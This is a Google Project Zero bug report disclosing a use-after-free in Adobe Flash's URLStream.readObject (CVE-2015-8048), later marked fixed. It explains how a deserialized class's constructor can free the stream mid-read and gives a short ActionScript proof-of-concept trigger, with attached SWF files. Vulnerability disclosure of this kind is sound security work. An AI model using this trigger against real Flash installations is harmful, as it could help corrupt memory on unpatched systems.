611 - Adobe Flash: Use-after-free in URLStream.readObject - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Dec 2015
Cc:	project-...@google.com
Id-4267 Finder-natashenka Deadline-90 CVE-2015-8048 Reported-2015-Nov-3 CCProjectZeroMembers Product-Flash Severity-High Vendor-Adobe

Adobe Flash: Use-after-free in URLStream.readObject

Project Member Reported by natashenka@google.com, Nov 4 2015

Back to list

There is a use-after-free in URLStream.readObject. If the object read is a registered class, the constructor will get invoked to create the object. If the constructor calls URLStream.close, the URLStream will get freed, and then the deserialization function will continue to write to it.

A minimal PoC is as follows:

//In main

flash.net.registerClassAlias("bob", myclass);
			
			
var u:URLStream = new URLStream();
myclass.u = u;
u.addEventListener(Event.COMPLETE, func);
u.load(new URLRequest("file.txt"));
	
function func(){	
	trace(u.readObject());
	}

// in myclass

static public var u;
		
public function myclass()
{
	u.close();
}

A sample script and SWF are attached. Note that file.txt needs to be in the same folder as getproperty.swf on a remote server.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

myclass.as
197 bytes Download

getproperty.swf
1.2 KB Download

file.txt
21 bytes View Download

getproperty.as
674 bytes Download

Project Member Comment 1 by natashenka@google.com, Nov 4 2015

Labels: Id-4267

This is PSIRT-4267

Project Member Comment 2 by natashenka@google.com, Dec 8 2015

Labels: CVE-2015-8048
Status: Fixed

Project Member Comment 3 by natashenka@google.com, Mar 31 2016

Labels: -Restrict-View-Commit

► Sign in to add a comment